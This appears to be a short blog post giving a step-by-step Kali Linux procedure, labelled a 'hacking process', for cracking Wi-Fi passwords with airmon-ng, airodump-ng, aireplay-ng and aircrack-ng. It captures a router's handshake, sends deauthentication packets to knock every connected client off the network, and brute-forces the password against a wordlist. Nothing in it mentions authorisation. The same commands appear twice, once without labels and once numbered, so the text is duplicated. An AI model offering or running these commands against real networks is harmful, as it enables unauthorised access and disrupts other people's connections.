Requirements
1.Kali Linux OS
Ipconfig - check for wireless network
airmon-ng start wlan0 : command used to change the network adapter to monitor mode.
Start hacking process
Step 1 : check for available networks
airodump-ng wlan0mon
airodump-ng -c #channel no# --bssid #enter the bssid# -w /root/hacking/ wlan0mon
open another terminal
aireplay-ng -0 10 -a #BSSID# wlan0mon
aircrack-ng -b #BSSID# -w /root/hacking/password.txt /root/hacking/*.cap
1.Kali Linux OS
2. Wifi Adapter
Commands to check if wifi adapter supports monitoring and packet injection mode
Ipconfig - check for wireless network
airmon-ng start wlan0 : command used to change the network adapter to monitor mode.
aireplay-ng --test wlan0mon : command used to check if the wireless network card supports packet injection mode.
Start hacking process
Step 1 : check for available networks
airodump-ng wlan0mon
Step 2 : start capturing the packet from wifi router and save the packets in your system.
airodump-ng -c #channel no# --bssid #enter the bssid# -w /root/hacking/ wlan0mon
step 3 : disconnect all clients connected to network
open another terminal
aireplay-ng -0 10 -a #BSSID# wlan0mon
Step 4 : checking for password in handshake file
aircrack-ng -b #BSSID# -w /root/hacking/password.txt /root/hacking/*.cap
Post a Comment